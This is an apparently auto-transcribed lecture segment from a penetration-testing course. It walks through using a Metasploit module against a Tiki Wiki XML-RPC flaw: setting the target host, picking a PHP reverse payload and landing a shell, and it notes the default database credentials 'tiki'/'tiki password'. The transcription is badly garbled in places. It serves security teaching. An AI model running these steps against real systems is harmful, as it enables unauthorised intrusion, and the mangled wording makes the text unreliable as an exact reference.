Exploitation (part 4) Open Source Vulnerability

00:04

or it. Another thing we saw

00:07

was that we have ah Tiki Wiki

00:12

program running on

00:15

Linux system.

00:20

Thought Tiki.

00:21

Vicky. We saw her out.

00:25

This one had a medicine, right? Ma Jo, when we looked not the open source Vulnerability data ways. What? You've met us. Wait for this one kind of neglected our mothers for it.

00:35

Well, it's a medicine for it. So

00:37

do a search for Tiki Wiki.

00:43

Looks like we actually have a few tiki ladies.

00:47

Uh, we do It's info on one of these about deep to be an exploit. So

00:55

let's do the first exploits of info on exploit

01:00

you next Web.

01:03

The HPV

01:06

Underscore how

01:08

rpc underscore vow. So remember, we were open source Vulnerability database

01:15

on 17 793 What was our open source vulnerability database before we should have taken better notes.

01:25

We'll see if it's are you, Earl. History

01:29

looks like 44 78

01:32

He's in our hero history,

01:34

and that's of course.

01:44

It was 44. 78.

01:49

Well, that takes me there.

01:53

Brooks would d b.

01:59

But if we went back to our nick dough out, but we would see that 44 78 is the right

02:05

one.

02:06

You sure?

02:08

Really be.

02:20

Yeah. So this is our

02:22

take you with your graph formula for are actually the one way chairs is not correct. We actually want

02:31

probably this one, right?

02:34

Looks right by the name

02:36

doing in pro on this one.

02:40

44 78 So that is indeed the correct one. So we would have to

02:46

verify this based on our open source vulnerability Davis number or R C V number.

02:53

Being like that is in this case, there is more than one, and we certainly don't want to send off the wrong one.

02:59

So use that one

03:01

exploits, we show options.

03:05

We don't need to send any proxies here or the V host your eyes, right? If all tiki with you, which is correct in our case, our port also correct. 80. It looks like our host is the only thing we need to change.

03:19

Shut our whose I p address a love letter

03:24

80 in my case

03:28

and ensure payload.

03:34

Andi, since this is PHP, bases well, actually end up with our PHP payload. Here is well

03:40

set tailored

03:44

PHP

03:46

interpreter.

03:47

Perverse underscore PCP or one of the other ones. We should know our options,

03:54

using it before

04:00

exploit

04:04

this one. Actually, it's database information as well. We don't see the database listening on a port here.

04:11

What we do get information about the back and database. It is listening on local. Who's on that has the default credentials here. Tiki and Tiki Password.

04:19

So it might be worth once we get on that box taking a look at it locally, see if there's any interesting information in there again, there's not. We haven't added anything, but you never know. I mean, I've had clients who store a lot of sensitive data is in there with you. Have actually worked for people who do the same thing, actually keep a lot of the

04:39

customer do toe in a week. You

04:43

do their reporting sharing their things like that.

04:46

It may be worth taking a look a corporate wicky, particularly one that requires law again,

04:54

fairly common wave sharing data. But we do get another session

04:59

time on clinics

05:02

moments again, PHP based

05:08

and we are this time actually on unprivileged user.

05:13

The better way to do Web servers is like this to give Web servers un privileged access. My perception, I ask does the same thing. Your Iowa am much about UN privileges you can get. We saw that our Santa Web servers actually running as a system service, which is a big no, no security wise. But unfortunately, that's

05:32

generally how our Apache friends type Web servers and stall on Windows. You are there. Start them manually as an administrative user. Each time or install them is a system service, and then they run a system just

05:46

unfortunate. But

05:48

you know, that happens functionality over security, right?

05:53

So medicine Point made. It's pretty easy on our Our last few is

05:57

on these manually, and you could certainly, like figure out what the vulnerability is in the PHP code and

06:03

figure out how to create this manually. We'll look at using public exploit code when we get into

06:11

our post exploitation and look at privilege escalation.

06:15

So we will see

06:16

some options of doing this a little bit more manually.

06:20

What